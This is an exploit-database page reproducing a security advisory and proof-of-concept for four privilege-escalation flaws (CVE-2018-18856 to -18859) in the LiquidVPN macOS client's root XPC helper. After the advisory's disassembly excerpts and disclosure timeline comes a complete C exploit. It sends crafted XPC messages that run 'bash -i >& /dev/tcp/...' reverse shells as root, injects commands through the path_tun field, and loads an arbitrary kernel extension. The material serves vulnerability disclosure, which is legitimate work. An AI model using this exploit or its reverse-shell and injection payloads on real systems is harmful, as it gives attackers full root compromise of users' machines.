Menu

Improved exploit search engine. Try it out

"LiquidVPN 1.36 / 1.37 - Privilege Escalation"

Author

"Bernd Leitner"

Platform

macos

Release date

2018-11-05

Release Date Title Type Platform Author
2019-07-02 "Mac OS X TimeMachine - 'tmdiagnose' Command Injection Privilege Escalation (Metasploit)" local macos Metasploit
2019-05-27 "Typora 0.9.9.24.6 - Directory Traversal" remote macos "Dhiraj Mishra"
2019-05-23 "Apple Mac OS X - Feedback Assistant Race Condition (Metasploit)" local macos Metasploit
2019-04-18 "Evernote 7.9 - Code Execution via Path Traversal" local macos "Dhiraj Mishra"
2019-03-01 "macOS XNU - Copy-on-Write Behavior Bypass via Mount of User-Owned Filesystem Image" dos macos "Google Security Research"
2019-02-13 "Apple macOS 10.13.5 - Local Privilege Escalation" local macos Synacktiv
2019-02-20 "FaceTime - Texture Processing Memory Corruption" dos macos "Google Security Research"
2019-01-31 "macOS XNU - Copy-on-Write Behaviour Bypass via Partial-Page Truncation of File" dos macos "Google Security Research"
2019-01-24 "Microsoft Remote Desktop 10.2.4(134) - Denial of Service (PoC)" dos macos "Saeed Hasanzadeh"
2018-12-14 "Safari - Proxy Object Type Confusion (Metasploit)" remote macos Metasploit
2018-11-29 "Mac OS X - libxpc MITM Privilege Escalation (Metasploit)" local macos Metasploit
2018-11-20 "Apple macOS 10.13 - 'workq_kernreturn' Denial of Service (PoC)" dos macos "Fabiano Anemone"
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-13 "CuteFTP Mac 3.1 - Denial of Service (PoC)" dos macos "Yair Rodríguez Aparicio"
2018-11-06 "FaceTime - 'VCPDecompressionDecodeFrame' Memory Corruption" dos macos "Google Security Research"
2018-11-06 "FaceTime - 'readSPSandGetDecoderParams' Stack Corruption" dos macos "Google Security Research"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
2018-05-30 "Yosoro 1.0.4 - Remote Code Execution" webapps macos "Carlo Pelliccioni"
2017-02-24 "Apple WebKit 10.0.2 - 'FrameLoader::clear' Universal Cross-Site Scripting" webapps macos "Google Security Research"
2017-06-06 "Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution" remote macos saelo
2017-05-04 "Apple Safari 10.0.3 - 'JSC::CachedCall' Use-After-Free" remote macos "saelo & niklasb"
2017-02-23 "Apple macOS HelpViewer 10.12.1 - XSS Leads to Arbitrary File Execution / Arbitrary File Read" remote macos "Google Security Research"
2018-07-30 "Charles Proxy 4.2 - Local Privilege Escalation" local macos "Mark Wadham"
2018-03-20 "Google Software Updater macOS - Unsafe use of Distributed Objects Privilege Escalation" local macos "Google Security Research"
2017-01-16 "Apple macOS Sierra 10.12.1 - 'physmem' Local Privilege Escalation" local macos "Brandon Azad"
2017-12-07 "Apple macOS High Sierra 10.13 - 'ctl_ctloutput-leak' Information Leak" local macos "Brandon Azad"
2017-11-28 "Apple macOS 10.13.1 (High Sierra) - 'Blank Root' Local Privilege Escalation" local macos Lemiorhan
2017-12-06 "Apple macOS 10.13.1 (High Sierra) - Insecure Cron System Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Proxifier for Mac 2.19 - Local Privilege Escalation" local macos "Mark Wadham"
2017-12-06 "Hashicorp vagrant-vmware-fusion 4.0.23 - Local Privilege Escalation" local macos "Mark Wadham"
Release Date Title Type Platform Author
2018-11-14 "SwitchVPN for macOS 2.1012.03 - Privilege Escalation" local macos "Bernd Leitner"
2018-11-05 "LiquidVPN 1.36 / 1.37 - Privilege Escalation" local macos "Bernd Leitner"
import requests
response = requests.get('https://www.nmmapper.com/api/exploitdetails/45782/?format=json')
                                                {"url": "https://www.nmmapper.com/api/exploitdetails/45782/?format=json", "download_file": "https://www.nmmapper.com/st/exploitdetails/45782/40285/liquidvpn-136-137-privilege-escalation/download/", "exploit_id": "45782", "exploit_description": "\"LiquidVPN 1.36 / 1.37 - Privilege Escalation\"", "exploit_date": "2018-11-05", "exploit_author": "\"Bernd Leitner\"", "exploit_type": "local", "exploit_platform": "macos", "exploit_port": null}
                                            

For full documentation follow the link above

blog comments powered by Disqus

Browse exploit DB API Browse

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
/*
=======================================================================
Title: Multiple Privilege Escalation Vulnerabilities
Product: LiquidVPN for MacOS
Vulnerable versions: 1.37, 1.36 and earlier
CVE ID(s): CVE-2018-18856, CVE-2018-18857, CVE-2018-18858, CVE-2018-18859
Impact: Critical
Homepage: https://www.liquidvpn.com
Identified: 2018-09-29
By: Bernd Leitner (bernd.leitner [at] gmail dot com)
=======================================================================

Vendor description:
-------------------
"LiquidVPN creates a secure encrypted link between your device and the
Internet.
When you connect to the Internet from your home, mobile device, office or a
WiFi
hotspot with encryption your traffic can’t be monitored by 3rd parties like
your
ISP. Without encryption, your ISP can store information about the websites
you
use and sell that data to anyone willing to pay for it. Some ISPs even
inject
advertisements into web pages to further profit off of the Internet service
you
pay for."

Source: https://www.liquidvpn.com


Business recommendation:
------------------------
By exploiting the vulnerabilities documented in this advisory, an attacker
can fully compromise a MacOS system with an installation of the LiquidVPN
client.

Users are urged to uninstall the application until the vendor ships a new
version
of the LiquidVPN client.


Vulnerability overview/description:
-----------------------------------
LiquidVPN installs the helper tool "com.smr.liquidvpn.OVPNHelper" for
performing
privileged (root) actions. In order to allow other LiquidVPN components to
send
messages to the helper tool, it implements an XPC service. Static code
analysis
showed, that the XPC service does not filter incoming messages. This means,
regular users (local attackers) can craft arbitrary XPC messages and send
them
to the service. This leads to the following issues:


1) "anycmd" Privilege Escalation (reserved CVE-2018-18857)

After receiving a message, the service checks for the existence of the
"anycmd" parameter:

============================================================================================
...
__text:00000001000012E8                 lea     rsi, aAnycmd    ; "anycmd"
__text:00000001000012EF                 mov     rdi, r14        ; char *
__text:00000001000012F2                 call    _strcmp
__text:00000001000012F7                 test    eax, eax
__text:00000001000012F9                 jnz     loc_1000016C2
__text:00000001000012FF                 mov     [rbp+var_10A38], r15
__text:0000000100001306                 lea     rsi, aCommandLine ;
"command_line"
__text:000000010000130D                 mov     rdi, rbx
...
__text:0000000100001336                 lea     rsi, aR         ; "r"
__text:000000010000133D                 mov     rdi, r14        ; char *
__text:0000000100001340                 call    _popen
...
============================================================================================

If "anycmd" is found, the "command_line" parameter is extracted from the
message
and directly passed on to a call to popen() as an argument.


2) "openvpncmd" Privilege Escalation (reserved CVE-2018-18856)

Similar to the previous vulnerability, the service checks if the "openvpn"
parameter exists. If it does, the "openvpncmd" parameter is extracted and
passed
on to a system() call as an argument:

============================================================================================
...
__text:00000001000013F1                 lea     rsi, aOpenvpncmd ;
"openvpncmd"
__text:00000001000013F8                 mov     rdi, rbx
__text:00000001000013FB                 call    _xpc_dictionary_get_string
...
__text:000000010000166A                 mov     rdi, r15        ; char *
__text:000000010000166D                 call    _system
__text:0000000100001672                 lea     rsi, aReply     ; "reply"
__text:0000000100001679                 lea     rdx, aOpenvpnCommand ;
"openvpn command executed (ver 3)"
__text:0000000100001680                 mov     rdi, r12
__text:0000000100001683                 call    _xpc_dictionary_set_string
...
============================================================================================

3) OS Command Injection (reserved CVE-2018-18858)

If the service detects the "openvpn" parameter in a message, it also checks
if
the parameters  "tun_path" or "tap_path" exist. If one of them (or both)
are found,
the values are used as source paths for a copy process using the system()
function.
However, the paths are not sanitized before being passed to system():

============================================================================================
...
__text:00000001000013CD                 lea     rsi, aPathTun   ; "path_tun"
__text:00000001000013D4                 mov     rdi, rbx
__text:00000001000013D7                 call    _xpc_dictionary_get_string
__text:00000001000013DC                 mov     r14, rax
__text:00000001000013DF                 lea     rsi, aPathTap   ; "path_tap"
__text:00000001000013E6                 mov     rdi, rbx
__text:00000001000013E9                 call    _xpc_dictionary_get_string
...
__text:000000010000143F                 call    _strcat
__text:0000000100001444                 mov     rdi, rbx        ; char *
__text:0000000100001447                 call    _strlen
...
__text:0000000100001497                 mov     rdi, rbx        ; char *
__text:000000010000149A                 call    _system
..
============================================================================================

4) Loading of arbitrary Kernel Extensions (reserved CVE-2018-18859)

The previous vulnerability can also be used to directly install an arbitrary
kernel extension. When the client is installed, "tun_path" and "tap_path"
are
pointed to the application folder for installing
"/Applications/LiquidVPN.app/Contents/Resources/tun.kext" and
"/Applications/LiquidVPN.app/Contents/Resources/tap.kext".
By crafting an XPC message containing attacker controlled kernel extension
paths,
the helper tool installs the kernel  extensions using a call to the system
function
kextload(). Note: Since MacOS 10.13, a Kext needs to be signed. In
adddition to that,
Apple introduced user-approval for installing third party kernel
extensions. However,
as an attacker has local access to the system and user-approval does not
require the
user to enter a root or admin password, this is not a problem.


Proof of concept:
-----------------
The following proof of concepts can be used to execute arbitrary system
commands:

1) "anycmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "anycmd");
xpc_dictionary_set_bool(message, "blocking", FALSE);
xpc_dictionary_set_string(message, "command_line", "[ARBITRARY CMD]");
...
============================================================================================

2) "openvpncmd" Privilege Escalation

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "openvpncmd", "[ARBITRARY CMD]");
...
============================================================================================

3) OS Command Injection

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;[ARBITRARY
CMD]");
...
============================================================================================

4) Loading of arbitrary Kernel Extensions

============================================================================================
...
xpc_dictionary_set_string(message, "cmd", "openvpn");
xpc_dictionary_set_string(message, "path_tun", "[PATH TO KEXT]");
...
============================================================================================


Vulnerable / tested versions:
-----------------------------
The following version has been tested and found to be vulnerable:
1.37 (most recent) and 1.36.

Earlier versions might be vulnerable as well.


Vendor contact timeline:
------------------------
2018-10-04: Requested security contact via twitter @LiquidVPN
2018-10-11: Contacted vendor through dave@liquidvpn.com
2018-10-11: Sent PGP encrypted advisory (
https://my.liquidvpn.com/canary/syswan)
2018-10-17: Requested status update from vendor
2018-10-30: Sent new contact details & public PGP key to dave@liquidvpn.com
2018-10-30: Received vendor notification:
            No patches will be issued as the LiquidVPN client for MacOS
will be
            replaced by new app in the future
2018-10-31: Published to Full Disclosure Mailing List

Solution:
---------
None.


Workaround:
-----------
None.


EOF B. Leitner / @2018
*/

// start netcat listener on port 9999

#include <stdio.h>
#include <sys/stat.h>
#include <sys/types.h>
#include <xpc/xpc.h>

void what(const char *bin) {
    printf("%s <1-4>\n", bin);
    printf("[1] Privesc (local reverse shell on port 9999 via \"anycmd\")\n");
    printf("[2] Privesc (local reverse shell on port 9999 via \"openvpncmd\")\n");
    printf("[3] Privesc (local reverse shell on port 9999 via OS command injection)\n");
    printf("[4] KEXT (load arbitrary kernel extension from /tmp/tun.kext (has to be signed for MacOS >= 10.13))\n");
}
 
int main(int argc, const char *argv[]) {

    if (argc == 1 || argc > 2) {
        what(argv[0]);
        return 0;
    }

    int option = atoi(argv[1]);
    xpc_object_t message = xpc_dictionary_create(NULL, NULL, 0);

    switch(option) {
        case 1:
            // "anycmd"
            xpc_dictionary_set_string(message, "cmd", "anycmd");
            xpc_dictionary_set_bool(message, "blocking", FALSE);
            xpc_dictionary_set_string(message, "command_line", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 2:
            // "openvpncmd"
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "openvpncmd", "bash -i >& /dev/tcp/127.0.0.1/9999 0>&1");
            break;
        case 3:
            // cmd injection via "path_tun". "path_tap" is affected by the same bug
            mkdir("/tmp/__dummy00_", 0755);
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/__dummy00_;bash -i >& /dev/tcp/127.0.0.1/9999 0>&1;cat");
            rmdir("/tmp/__dummy00_");
            break;
        case 4:
            // load arbitrary kext via "path_tun". "path_tap" is affected by the same bug
            xpc_dictionary_set_string(message, "cmd", "openvpn");
            xpc_dictionary_set_string(message, "path_tun", "/tmp/tun.kext");
            break;
        default:
            what(argv[0]);
            return 0;
    }

    printf("[+] sending xpc message.\n");

    xpc_connection_t connection = xpc_connection_create_mach_service("com.smr.liquidvpn.OVPNHelper", NULL, 0);
    if (connection == NULL) {
        printf("[-] connection to xpc service failed.\n");
        return 1;
    }

    xpc_connection_set_event_handler(connection, ^(xpc_object_t e) {
        // we don't need that here.
    });

    xpc_connection_resume(connection);

    printf("[+] check your listener.\n");
    xpc_object_t result = xpc_connection_send_message_with_reply_sync(connection, message);

    printf("[+] bye.\n");

    return 0;
}